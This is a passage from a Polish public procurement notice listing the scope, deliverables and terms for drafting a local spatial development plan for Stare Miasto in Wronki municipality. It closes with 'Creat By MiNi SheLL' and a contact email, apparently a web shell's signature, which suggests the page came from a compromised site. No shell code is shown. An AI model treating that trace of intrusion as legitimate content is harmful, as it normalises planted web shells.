9) sporządzenie wykazu opinii i uzgodnień do projektu miejscowego planu,
10) wprowadzenie zmian do projektu planu wynikających z uzyskanych opinii                           i dokonanych uzgodnień,
11) sporządzenie wniosków w spr. uzyskania zgody Ministra Rolnictwa na przeznaczenie gruntów rolnych na cele nierolnicze i nieleśne,
12) sporządzenie prognozy skutków finansowych uchwalenia planu,
13) obsługę wyłożenia do publicznego wglądu projektu miejscowego planu zagospodarowania przestrzennego wraz z ostateczną prognozą oddziaływania na środowisko,
14) udział w dyskusji publicznej nad przyjętymi w projekcie planu rozwiązaniami,
15) sporządzenie wykazu uwag - analiza i opracowanie propozycji rozpatrzenia uwag przez Burmistrza, które zostały wniesione w związku z wyłożeniem projektu planu do publicznego wglądu, w razie konieczności składanie wyjaśnień osobą zainteresowanym (pisemnie                       i ustnie),
16) wprowadzenie zmian do projektu planu w związku z rozpatrzeniem i uwzględnieniem uwag, 
17) ponowne uzgadnianie projektu planu w niezbędnym zakresie,
18) wprowadzenie zmian do projektu planu wynikających z ponowionych uzgodnień                         i wyłożeń projektu planu,
19) prezentacja projektu planu Radzie Miasta i Gminy Wronki oraz Burmistrzowi Miasta               i Gminy Wronki wraz z listą nieuwzględnionych uwag, 
20) przygotowanie projektu planu do uchwalenia wraz z uzasadnieniem,
21) przygotowanie pisemnego uzasadnienia i podsumowania do przyjętego dokumentu zgodnie z art. 42 i 55 pkt 3 ustawy z dnia 3 października 2008 r. o udostępnieniu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko (Dz. U. Nr 199, poz. 1227),
22) przygotowanie i skompletowanie dla Wojewody Wielkopolskiego dokumentacji formalno - prawnej oraz planistycznej wraz z uchwałą Rady Miasta i Gminy Wronki w celu sprawdzenia zgodności z prawem i publikacji w Dzienniku Urzędowym Województwa Wielkopolskiego - 2 egz. oryginał i kopia (oprawione w sposób uniemożliwiający dekompletację).

3. Wykonawca winien wykonać przedmiot zamówienia w wersji elektronicznej płyta CD        w formacie uzgodnionym z Zamawiającym oraz w postaci drukowanej w następujących ilościach egzemplarzy:
1) Koncepcja projektu planu wraz z inwentaryzacją - 1 egz. (mapa w skali 1:1000, złożona do formatu A4);
2)Projekt planu do opiniowania przez GKUA wraz z prognozą oddziaływania na środowisko - 1 ezg. (mapa w skali 1:1000, złożona do formatu A4);
3)Projekt planu wraz z prognozą oddziaływania na środowisko do opiniowania i uzgadniania - w ilości odpowiedniej do wymogów ustawy o planowaniu i zagospodarowaniu przestrzennym + 1 egz. (mapy w pomniejszonej skali do formatu A3); 
4)Projekt planu z prognozą oddziaływania na środowisko do wyłożenia -1 egz. (mapa w oryginalnej skali, złożona do formatu A4);
5) Projekt planu z uzasadnieniem do uchwalenia -1 egz. (mapa w oryginalnej skali, złożona do formatu A4);
6) Prognoza skutków finansowych i uchwalenia planu - 2 egz.
7) Uchwalony plan - 9 egz. (7 map w oryginalnej skali, złożonych do formatu A4, 2 egz. map w formacie A3),
8) Po ogłoszeniu w Dzienniku Urzędowym Województwa Wielkopolskiego - 1 egz. mapy                w oryginalnej skali, w formie zabezpieczonej przed zniszczeniem np. laminowanej,                          z przeznaczeniem do wywieszenia na ścianie,
9) Przygotowanie korespondencji, ogłoszeń, obwieszczeń i uchwał tylko w formie elektronicznej.

4. Zapis planu należy wykonać w takiej formie, ażeby dla każdej jednostki elementarnej (najmniejszego obszaru wydzielonego przestrzennie) zawarte były wszystkie ustalenia pozwalające na bezpośredni wydruk jako wypis i wyrys z miejscowego planu zagospodarowania przestrzennego (do dalszych prac projektowych). Ustalenia dla jednostki nie mogą być zawarte w kilku miejscach tego planu. W tekście planu należy używać określeń i terminów stosowanych w istniejącym ustawodawstwie. W każdej sytuacji należy wprowadzić definicję terminu. Używając określonych, stosownych terminów należy przywołać w rozumieniu jakiej podstawy prawnej jest on użyty. Część szczegółowa odnosząca się do jednostki elementarnej musi co najmniej zawierać elementy zawarte            w art. 15 ust.2, ewentualnie ust. 3 ustawy oraz wszelkie inne istotne ustalenia. Cała dokumentacja planistyczna powinna być wykonana w technice cyfrowej(szczegóły techniczne   i programowanie ustalone zostaną na etapie roboczym) umożliwiającej na bieżące korzystanie z opracowania. Tekst planu i rysunek planu należy tak wykonywać, ażeby można było wykonać wydruk dla danej jednostki elementarnej jako wypis i wyrys z planu.

5. Wszystkie mapy i rysunki planu należy wykonać w technice kolorowej.                                Tekst planu powinien być nie w formie opisu, lecz w formie dokumentu prawnego, zgodnie z rozporządzeniem Prezesa Rady Ministrów z dnia 20 czerwca 2002 roku w sprawie zasad techniki prawodawczej (Dz. U. nr 100, poz. 908). Wykonawca zobowiązany jest do przygotowania projektu wszystkich dokumentów formalnoprawnych i na każdym etapie zobowiązany jest do sprawdzenia poprawności przebiegu toku formalno-prawnego, a w przypadku wystąpienia nieprawidłowości zobowiązany jest pisemnie poinformować o tym prowadzącego  opracowanie ze strony urzędu.

6. Wykonawca sporządzi przedmiot zamówienia oraz zapewni we własnym zakresie:
a)	mapy do celów planowania przestrzennego zgodne z warunkami rozporządzenia Ministra Infrastruktury w sprawie wykonywania planów zagospodarowania przestrzennego,
b)	inne mapy topograficzne niezbędne do opracowania prognozy skutków wpływu ustaleń planu na środowisko przyrodnicze,
c)	inne niezbędne materiały do przygotowania projektu miejscowego planu zagospodarowania przestrzennego 
d)	uczestnictwo projektantów w procedurze konsultacji społecznych, wyłożenia projektu  miejscowego planu zagospodarowania przestrzennego oraz procedurze uchwalenia planu przez Radę Miasta i Gminy Wronki.

7. Zamawiający przekaże Wykonawcy zamówienia następujące materiały wyjściowe:
a) informację z ewidencji gruntów,
b) kopie wniosków do planu miejscowego,
c) do wglądu wydane decyzje o warunkach zabudowy i zagospodarowania terenu, decyzje             o ustaleniu lokalizacji inwestycji celu publicznego,
d) do wglądu Studium uwarunkowań i kierunków zagospodarowania przestrzennego miasta    i gminy Wronki. 

8. Wykonanie czynności wynikających z art. 17 pkt 1,2,11 ustawy z dnia 27 marca 2003 roku o planowaniu i zagospodarowaniu przestrzennym oraz koszty z tym związane poniesie Zamawiający.

9. W opracowaniu miejscowego planu zagospodarowania przestrzennego należy stosować wymagania określone Rozporządzeniem Ministra Infrastruktury z dnia 26 sierpnia 2003 r.              w sprawie wymaganego zakresu projektu miejscowego planu zagospodarowania przestrzennego (Dz. U. Nr 164, poz. 1587).

10. Zamawiający będzie uczestniczył w postępowaniu w trakcie opracowywania miejscowego planu zagospodarowania przestrzennego w przesłaniu materiałów opracowanych przez Wykonawcę zgodnie z wymogami przepisów i wskazówek Wykonawcy, ponosząc koszt przesyłek. Za treść merytoryczną i przestrzeganie wymagań formalnych odpowiada Wykonawca. Koszt druku i powielania materiałów ponosi Wykonawca..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.41.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 10.12.2015.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Opracowanie miejscowego planu zagospodarowania przestrzennego gminy Wronki w obrębie miejscowości Stare Miasto (powierzchnia około 21 ha)..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres zamówienia

1.	Opracowanie miejscowego planu zagospodarowania przestrzennego gminy Wronki                               w obrębie miejscowości Stare Miasto (powierzchnia około 21 ha). Obszar do opracowania projektu planu określa załączniki do uchwały Nr XXI/181/2012 z dnia 26 czerwca 2012 r., zgodnie z obowiązującymi przepisami w tym zakresie. Skala opracowania 1: 1000.

W zakresie przeznaczenia terenów, studium wskazuje: istniejącą wielofunkcyjną zabudowę wiejską, istniejący teren rozwoju usług, a także tereny upraw rolnych, łąk                     i pastwisk.  

2. Zakres przedmiotu zamówienia obejmuje:
1) przygotowanie wzorów pism, rozdzielników, ogłoszeń oraz wszelkich opracowań i analiz niezbędnych dla potrzeb sporządzenia planu, 
2) analizę wniosków do planu wraz z opracowaniem wykazu oraz propozycji ich rozpatrzenia,
3) uzyskanie niezbędnych podkładów geodezyjnych,
4) opracowanie koncepcji planu,
5) prezentację koncepcji planu na mapie w skali 1:1000 Burmistrzowi Miasta i Gminy Wronki lub podczas konsultacji społecznych wraz z opracowaniem zawierającym inwentaryzację terenowe, tekstowe i graficzne takiej jak:
a) zainwestowania i użytkowania terenu (mapa),
b) stan własności (naniesiony odrębnie na koncepcji oraz projekcie planu - mapa),
c) infrastrukturę techniczną w zakresie koniecznym do ustaleń projektowych na podstawie dostępnych dokumentacji z naniesieniem instalacji projektowych (mapa).
6) opracowanie projektu planu do opiniowania przez Gminną Komisję Urbanistyczno                      - Architektoniczną, Burmistrza Miasta i Gminy Wronki w tym jego prezentacja na posiedzeniu Gminnej Komisji Urbanistyczno - Architektonicznej, 
7) sporządzenie prognozy oddziaływania na środowisko z uwzględnieniem postępowania               w sprawie strategicznej oceny oddziaływania na środowisko, 
8) opracowanie projektu planu z uwzględnieniem uwag Burmistrza Miasta i Gminy Wronki, Gminnej Komisji Urbanistyczno - Architektonicznej i przygotowanie materiałów do dalszego opiniowania i uzgadniania przez organy i instytucje określone w ustawie o planowaniu                       i zagospodarowaniu przestrzennym,
9) sporządzenie wykazu opinii i uzgodnień do projektu miejscowego planu,
10) wprowadzenie zmian do projektu planu wynikających z uzyskanych opinii                           i dokonanych uzgodnień,
11) sporządzenie prognozy skutków finansowych uchwalenia planu,
12) obsługę wyłożenia do publicznego wglądu projektu miejscowego planu zagospodarowania przestrzennego wraz z ostateczną prognozą oddziaływania na środowisko,
13) udział w dyskusji publicznej nad przyjętymi w projekcie planu rozwiązaniami,
14) sporządzenie wykazu uwag - analiza i opracowanie propozycji rozpatrzenia uwag przez Burmistrza, które zostały wniesione w związku z wyłożeniem projektu planu do publicznego wglądu, w razie konieczności składanie wyjaśnień osobą zainteresowanym (pisemnie                       i ustnie),
15) wprowadzenie zmian do projektu planu w związku z rozpatrzeniem i uwzględnieniem uwag, 
16) ponowne uzgadnianie projektu planu w niezbędnym zakresie,
17) wprowadzenie zmian do projektu planu wynikających z ponowionych uzgodnień                         i wyłożeń projektu planu,
18) prezentacja projektu planu Radzie Miasta i Gminy Wronki oraz Burmistrzowi Miasta               i Gminy Wronki wraz z listą nieuwzględnionych uwag, 
19) przygotowanie projektu planu do uchwalenia wraz z uzasadnieniem,
20) przygotowanie pisemnego uzasadnienia i podsumowania do przyjętego dokumentu zgodnie z art. 42 i 55 pkt 3 ustawy z dnia 3 października 2008 r. o udostępnieniu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko (Dz. U. Nr 199, poz. 1227),
21) przygotowanie i skompletowanie dla Wojewody Wielkopolskiego dokumentacji formalno - prawnej oraz planistycznej wraz z uchwałą Rady Miasta i Gminy Wronki w celu sprawdzenia zgodności z prawem i publikacji w Dzienniku Urzędowym Województwa Wielkopolskiego - 2 egz. oryginał i kopia (oprawione w sposób uniemożliwiający dekompletację).

3. Wykonawca winien wykonać przedmiot zamówienia w wersji elektronicznej płyta CD w formacie uzgodnionym z Zamawiającym oraz w postaci drukowanej w następujących ilościach egzemplarzy:
1) Koncepcja projektu planu wraz z inwentaryzacją - 1 egz. (mapa w skali 1:1000, złożona do formatu A4);
2)Projekt planu do opiniowania przez GKUA wraz z prognozą oddziaływania na środowisko - 1 ezg. (mapa w skali 1:1000, złożona do formatu A4);
3)Projekt planu wraz z prognozą oddziaływania na środowisko do opiniowania i uzgadniania - w ilości odpowiedniej do wymogów ustawy o planowaniu i zagospodarowaniu przestrzennym + 1 egz. (mapy w pomniejszonej skali do formatu A3); 
4)Projekt planu z prognozą oddziaływania na środowisko do wyłożenia -1 egz. (mapa w oryginalnej skali, złożona do formatu A4);
5) Projekt planu z uzasadnieniem do uchwalenia -1 egz. (mapa w oryginalnej skali, złożona do formatu A4);
6) Prognoza skutków finansowych i uchwalenia planu - 2 egz.
7) Uchwalony plan - 9 egz. (7 map w oryginalnej skali, złożonych do formatu A4, 2 egz. map w formacie A3),
8) Po ogłoszeniu w Dzienniku Urzędowym Województwa Wielkopolskiego - 1 egz. mapy                w oryginalnej skali, w formie zabezpieczonej przed zniszczeniem np. laminowanej,                          z przeznaczeniem do wywieszenia na ścianie,
9) Przygotowanie korespondencji, ogłoszeń, obwieszczeń i uchwał tylko w formie elektronicznej.

4. Zapis planu należy wykonać w takiej formie, ażeby dla każdej jednostki elementarnej (najmniejszego obszaru wydzielonego przestrzennie) zawarte były wszystkie ustalenia pozwalające na bezpośredni wydruk jako wypis i wyrys z miejscowego planu zagospodarowania przestrzennego (do dalszych prac projektowych). Ustalenia dla jednostki nie mogą być zawarte w kilku miejscach tego planu. W tekście planu należy używać określeń i terminów stosowanych w istniejącym ustawodawstwie. W każdej sytuacji należy wprowadzić definicję terminu. Używając określonych, stosownych terminów należy przywołać w rozumieniu jakiej podstawy prawnej jest on użyty. Część szczegółowa odnosząca się do jednostki elementarnej musi co najmniej zawierać elementy zawarte            w art. 15 ust.2, ewentualnie ust. 3 ustawy oraz wszelkie inne istotne ustalenia. Cała dokumentacja planistyczna powinna być wykonana w technice cyfrowej(szczegóły techniczne   i programowanie ustalone zostaną na etapie roboczym) umożliwiającej na bieżące korzystanie z opracowania. Tekst planu i rysunek planu należy tak wykonywać, ażeby można było wykonać wydruk dla danej jednostki elementarnej jako wypis i wyrys z planu.

5. Wszystkie mapy i rysunki planu należy wykonać w technice kolorowej.                                Tekst planu powinien być nie w formie opisu, lecz w formie dokumentu prawnego, zgodnie z rozporządzeniem Prezesa Rady Ministrów z dnia 20 czerwca 2002 roku w sprawie zasad techniki prawodawczej (Dz. U. nr 100, poz. 908). Wykonawca zobowiązany jest do przygotowania projektu wszystkich dokumentów formalnoprawnych i na każdym etapie zobowiązany jest do sprawdzenia poprawności przebiegu toku formalno-prawnego, a w przypadku wystąpienia nieprawidłowości zobowiązany jest pisemnie poinformować o tym prowadzącego  opracowanie ze strony urzędu.

6. Wykonawca sporządzi przedmiot zamówienia oraz zapewni we własnym zakresie:
a)	mapy do celów planowania przestrzennego zgodne z warunkami rozporządzenia Ministra Infrastruktury w sprawie wykonywania planów zagospodarowania przestrzennego,
b)	inne mapy topograficzne niezbędne do opracowania prognozy skutków wpływu ustaleń planu na środowisko przyrodnicze,
c)	inne niezbędne materiały do przygotowania projektu miejscowego planu zagospodarowania przestrzennego 
d)	uczestnictwo projektantów w procedurze konsultacji społecznych, wyłożenia projektu  miejscowego planu zagospodarowania przestrzennego oraz procedurze uchwalenia planu przez Radę Miasta i Gminy Wronki.

7. Zamawiający przekaże Wykonawcy zamówienia następujące materiały wyjściowe:
a) informację z ewidencji gruntów,
b) kopie wniosków do planu miejscowego,
c) do wglądu wydane decyzje o warunkach zabudowy i zagospodarowania terenu, decyzje             o ustaleniu lokalizacji inwestycji celu publicznego,
d) do wglądu Studium uwarunkowań i kierunków zagospodarowania przestrzennego miasta    i gminy Wronki. 

8. Wykonanie czynności wynikających z art. 17 pkt 1,2,11 ustawy z dnia 27 marca 2003 roku o planowaniu i zagospodarowaniu przestrzennym oraz koszty z tym związane poniesie Zamawiający.

9. W opracowaniu miejscowego planu zagospodarowania przestrzennego należy stosować wymagania określone Rozporządzeniem Ministra Infrastruktury z dnia 26 sierpnia 2003 r.              w sprawie wymaganego zakresu projektu miejscowego planu zagospodarowania przestrzennego (Dz. U. Nr 164, poz. 1587).

10. Zamawiający będzie uczestniczył w postępowaniu w trakcie opracowywania miejscowego planu zagospodarowania przestrzennego w przesłaniu materiałów opracowanych przez Wykonawcę zgodnie z wymogami przepisów i wskazówek Wykonawcy, ponosząc koszt przesyłek. Za treść merytoryczną i przestrzeganie wymagań formalnych odpowiada Wykonawca. Koszt druku i powielania materiałów ponosi Wykonawca..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.41.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 10.12.2015.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com